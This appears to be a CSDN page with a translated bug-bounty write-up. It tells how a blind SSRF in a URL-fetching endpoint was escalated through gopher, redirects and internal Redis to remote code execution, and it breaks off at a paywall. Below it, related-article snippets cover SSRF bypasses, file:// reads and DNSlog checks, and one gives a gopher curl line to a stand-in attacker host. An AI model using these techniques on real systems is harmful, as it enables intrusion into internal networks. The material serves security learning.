翻译文章 | Just gopher it!无回显SSRF升级为RCE

最新推荐文章于 2025-07-06 17:04:04 发布
最新推荐文章于 2025-07-06 17:04:04 发布
阅读量716 收藏 3
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40418457/article/details/117450667
本文讲述了作者如何在一个大型bug赏金活动中发现并利用一个无回显SSRF漏洞,通过Gopher协议和302重定向最终实现RCE的过程。在侦查阶段,作者发现一个返回URL信息的GET请求,通过测试发现可以访问到内部子域名。在尝试升级SSRF时,利用Gopher协议和内部开放的Redis服务,成功构造了反向shell,最终获得了远程代码执行权限。

前言:

发现此漏洞的bug bounty团队不允许公开披露,因此我不会直接命名所涉及的程序。

我能说的是,这是在Hackerone运行时间最长、规模最大的bug赏金活动中发现的。多个Hackerone的现场黑客活动已经包括这个活动。

毋庸置疑,这是一家拥有世界级安全团队的公司,多年来一直有大量专门针对它的黑客专家——这使得这个漏洞的存在更加令人惊讶。

第1部分:侦察

通常对于一个大范围的bug赏金程序,我会从子域枚举开始,以增加我的攻击面,但在这种情况下,我只针对我的目标上的一个web应用程序。

因为我只专注于一个web应用,所以我开始使用GAU工具获取url和路径列表。我还查看了各种javascript文件以寻找隐藏的路径,并使用ffuf工具进行了一些目录模糊爆破。我通过这些方法找到了一些有趣的路径,但没有发现任何可攻击的。

由于第一种侦查方法没有导致任何发现,我尝试了另一种方法-测试web应用程序的各种功能,同时运行Burp代理在后台。所有发出的请求都存储在Burp中的一个有组织的列表中,这样就可以很容易地查看所有请求,以寻找任何有趣的或可能存在漏洞的内容。

在测试web应用程序的功能后,我开始查看存储在代理日志中的请求,并遇到类似的请求:

GET /xxx/logoGrabber?url= [http://example.com][0]

Host: site.example.com

一个接受url参数的GET请求。这个请求的响应看起来是这样的,包含了关于url的标题和logo的信息:

{"responseTime":"99999ms","grabbedUrl":" [http://example.com][0] ","urlInfo":{"pageTitle":"Example Title","pageLogo":"pagelogourl"}}

这个请求立即引起了我的兴趣,因为它返回了一些关于URL的数据。当遇到从URL返回信息的请求时,测试SSRF是一个好主意。

第2部分:发现SSRF

我在SSRF的第一次尝试失败了。我能够得到外部与我的服务器的交互,但没有获得任何内部IP地址,因为他们有适当的保护。

在未能命中任何内部IP地址后,我决定看看能否命中该公司的任何公开的子域名。我为我的目标做了一些子域枚举,然后开始在请求时覆盖所有枚举域。

最后,我很幸运地发现了一些请求,这些请求返回了来自非公开访问站点的标题数据。

子域名somecorpsite.example.com就是一个很好的例子。当我试图在浏览器中访问http://somecor

最低0.47元/天 解锁文章

200万优质内容无限畅学
火线安全
关注
【网络安全 | 漏洞挖掘】利用 Gopher 实现雅虎邮件 Blind SSRF 升级RCE远程命令执行
等风来
01-19 3830
在提交请求后,Burp Collaborator URL受到了访问,显然,重定向与gopher结合成功,则此时可以利用gopher协议访问内部IP。结果是:没有请求发送到 Burp Collaborator,推断目标服务器可能限制了 Gopher 协议,绕过方法之一是重定向。由于127.0.0.1在不使用 gopher 的情况下不可访问,且测试数据可控,故测试127.0.0.1。在提交请求后,重定向被跟随,导致 Burp Collaborator URL受到了访问。
【网络安全 | 漏洞挖掘】SSRF绕过实现窃取字节跳动LarkSuite元数据
等风来
01-22 4360
LarkSuite是字节跳动旗下的一款集成办公套件,提供团队协作、通讯、日程管理等功能的企业级应用。SSRF 通常存在于以下功能点:1、消息功能:部分聊天功能会渲染任何链接的预览。2、文件转换:将用户可控内容转换为PDF等文件类型。3、文件上传:SVG文件如果在服务器端渲染可能导致SSRF。4、文件导入:例如Excel文档、Word文档、Zip文件等通常需要服务器端处理。修改XML文件(存在于Excel、Word中)可能导致文档在服务器端处理时出现XXE/SSRF漏洞。
无回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header) 数据查询API
SSRF在有无回显方面的利用及其思考与总结
weixin_50464560的博客
05-16 6604
​ 对于SSRF的利用、危害及绕过[MisakiKata ]师傅先知上的的一文介绍的非常详细,看了这篇文章也学到了很多。由于在实际场景中还遇到很多类似SSRF的点,所以还想深入探讨一下其他利用方式以及无回显情况下的SSRF。 1.一般层面(有回显)SSRF及bypass利用技巧 可能存在SSRF的URL: http://www.xxx.com/vul.php?url=http://www.xxc.com/xxx.jpg http://share.xxx.com/index.php?url=htt
Web攻防-XML&XXE&无回显带外&SSRF元数据&DTD实体&OOB盲注&文件拓展
最新发布
SuperherRo的博客
07-06 1385
知识点: 1、WEB攻防-XML&XXE-注入原理&分类&修复 2、WEB攻防-XML&XXE-文件读取&SSRF&实体引用 3、WEB攻防-XML&XXE-无回显&升级拓展&挖掘思路
SSRF服务端请求伪造
q
06-18 843
可以看到127进行16进制转换后为7f,在16进制前加上0x使电脑识别为16进制,ping 0x7f.0.0.1 计算机可识别为127.0.0.1。url需要以http://ctf开头,以show结尾,才能触发file_get_contents()由于有部分协议http这类不支持,可以gopher来进行通讯(mysql,redis等)访问生成的pass.php,查看根目录下的flag。(文件读取,加载,数据操作类的函数)八进制前面加上0,使电脑识别为八进制。过滤localhost,0,1等。
SSRF漏洞
qq_61553520的博客
05-16 934
SSRF:Server-Side Request Forgery,即服务器端请求伪造,就是让服务器替攻击者发请求。SSRF的目标往往是从外网无法访问的内部系统。SSRF 形成原因:大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。存在SSRF漏洞的服务器可以作为我们攻击的跳板,直接攻击内网系统,因为内网普遍安全性较为薄弱,就极有可能导致内网沦陷。
Web攻防—SSRF服务端请求伪造&Gopher伪协议&无回显利用
2301_76227305的博客
04-12 1571
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
SSRF---gopher和dict打redis
unexpectedthing的博客
12-01 6783
前言 之前关于SSRF打redis(redis的未授权漏洞)都没咋总结,现在总结一下。 redis简介 redis是一个key-value存储系统,是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。
SSRF服务器请求伪造
没有网络安全就没有国家安全
08-20 1032
本篇主要讲解SSRF服务器请求伪造漏洞并复现漏洞和利用,以及如何绕过与防御
【第57课】SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
Lucker_YYY的博客
08-21 1187
免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。#知识点:1、SSRF-原理-外部资源加载。
WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
SuperherRo的博客
09-18 2585
1、SSRF-原理-外部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数
Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
qq_61553520的博客
03-30 2657
小迪安全-Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
DAY57WEB 攻防-SSRF 服务端请求&Gopher 伪协议&无回显利用&黑白盒挖掘&业务功能点
m0_74402888的博客
10-19 1000
一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。Web常见访问,如http://127.0.0.1、http://127.0.0.1:8080、http://192.168.1.1、http://192.168.1.2等。可以防止类似于file:///,gopher://,ftp:// 等引起的问题。从文件系统中获取文件内容,如,file:///etc/passwd、file:///D:/1.txt。file:/// 从文件系统中获取文件内容,如,file:///etc/passwd。
渗透无回显,放弃 or 看这篇文章
大河之犬的博客
05-15 984
通俗的说就是我有个已注册的域名a.com,我在域名代理商那里将域名设置对应的ip 1.1.1.1 上,这样当我向dns服务器发起a.com的解析请求时,DNSlog中会记录下他给a.com解析,解析值为1.1.1.1,而我们这个解析的记录的值就是我们要利用的地方。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。打开新网页并粘贴在url上,访问这个三级域名。ceye使用方法类似。
-SSRF 服务端请求&Gopher 伪协议&无回显利用&黑白盒挖掘&业务功能点
2302_80396242的博客
04-19 373
(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的。形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目。下载:例如富文本编辑器中的点击下载图片到本地;网站采集,网站抓取的地方:一些网站会针对你输入的。社交分享功能:获取超链接的标题等内容进行显示。攻击的目标是从外网无法访问的内部系统。在线翻译:给网址翻译对应网页的内容。以及文本的内容作为显示以求一。数据库内置功能:数据库的比如。
dnslog mysql注入_DNSlog实现无回显注入
weixin_30877741的博客
01-31 503
背景在某些不能直接通过漏洞获得回显信息的情况下,我们可以利用DNSlog来进行突破,在发起DNS请求的时候,会把我们想要得到的数据一同外带出来。在SQL盲注中,最常用的就是二分法了,这种方法不仅麻烦,而且经常的发送请求,还容易被waf探测到,这时利用DNS解析时产生的日志来查看我们想要的数据就方便得多了。可使用场景:SQL注入中的盲注XSS绕过CSP无回显的命令执行无回显SSRF原理基本原理从下...
SSRF漏洞详解
热门推荐
qq_48904485的博客
03-22 2万+
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
SSRF漏洞详解(全面)
m0_64481831的博客
02-20 1948
SSRF往往是因为没有对目标地址进行过滤或限制SSRF相关的危险函数:file_get_contents()、fsockopen()、curl_exec()SSRF相关危险协议:file://、dict://、http://、万精油gopher://SSRF几大绕过:利用[::]绕过、利用@或。绕过、利用短地址绕过、利用IP地址转换绕过、利用一些特殊符号绕过SSRF判断方法分为有回显、半回显、无回显情况,无回显情况利用DNS带外测试。
ssrf无回显和全回显
04-03
### SSRF无回显与全回显的区别及利用方式 #### 一、SSRF无回显的特点及其利用方式 SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的安全漏洞,允许攻击者通过应用程序发送恶意构造的请求到内部或外部目标。对于无回显的情况: - **定义** 无回显意味着攻击者的请求不会直接返回任何响应数据给客户端。这种类型的SSRF通常依赖于间接反馈机制来确认其效果[^4]。 - **特点** - 不会显示具体的错误消息或者详细的页面内容。 - 可能仅提供简单的状态码(如200 OK),甚至没有任何明确的结果指示。 - **利用方式** - 使用DNS记录监控技术检测是否有来自受害系统的查询行为。例如,可以通过设置一个特殊的子域名指向自己的日志收集器,并观察该名称是否被解析过。 - 利用`gopher`协议或其他类似的伪协议实现更复杂的操作,比如读取文件系统中的敏感信息或将命令注入到后台进程中[^3]。 ```bash curl 'gopher://attacker.com/...' ``` #### 二、SSRF全回显的特点及其利用方式 相比之下,全回显提供了更为丰富的交互体验: - **定义** 当发生全回显时,服务器不仅完成了指定的操作还会把完整的应答包转发回来供用户查看。这使得分析过程更加直观简单[^2]。 - **特点** - 返回的数据量较大,可能包括但不限于HTML源代码、API接口调用结果以及各种元数据标签等。 - 更容易判断是否存在特定条件下的异常状况,便于调试和验证假设成立与否。 - **利用方式** - 获取目标网络架构内的隐藏服务地址列表,进而寻找潜在的安全隐患点。 - 测试跨域资源共享策略(CORS),尝试绕过同源限制访问受限资源。 ```javascript fetch('http://internal-service/api/data') .then(response => response.json()) .then(data => console.log(data)); ``` - 枚举内网IP范围并扫描开放端口情况,绘制出一幅清晰的地图用于后续渗透测试活动开展。 #### 总结对比表 | 特性 | 无回显 | 全回显 | |--------------|---------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------| | 数据可见度 | 非常低;需借助第三方工具辅助判定 | 较高;可以直接看到大部分原始回应 | | 复杂程度 | 中等到高等次 | 相对较低 | | 常见应用场景 | DNS预览、基于时间延迟猜测数据库版本号 | 文件下载上传界面抓取、配置管理平台参数泄露 |
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值